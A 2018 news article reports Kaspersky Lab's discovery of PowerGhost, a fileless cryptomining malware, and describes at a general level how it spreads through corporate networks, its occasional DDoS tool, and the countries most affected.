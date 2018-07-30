A new malware has come into light which can be a bad news for corporates. The malware is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.

The malware named PowerGhost by Kaspersky Lab which unearthed it uses file-less techniques to establish the illegal miner within the victim system.

“The malicious program uses lots of file-less techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive,” the Lab said.

The script of the malware works in various steps. First, PowerGhost checks if a new version is available. If there is, it downloads the new version and launches it instead of itself. In the second step, the malware starts propagating through the network of computers, infesting as many devices as possible.

In the next couple of steps, the malware tries to escalate its privileges and establishes a foothold in the system using various manoeuvres.

The Lab also found some extremely dangerous implication of the malware attack. “In one PowerGhost version, we detected a tool for conducting DDoS attacks. The malware writers obviously decided to make some extra money by offering DDoS services,” the Lab said.

Geography of infections by the miner. Source: Kaspersky Lab

The developing world was the biggest target of the malware with India, Brazil, Columbia and Turkey encountering most of them. In India, up to 290 users were affected by the malware.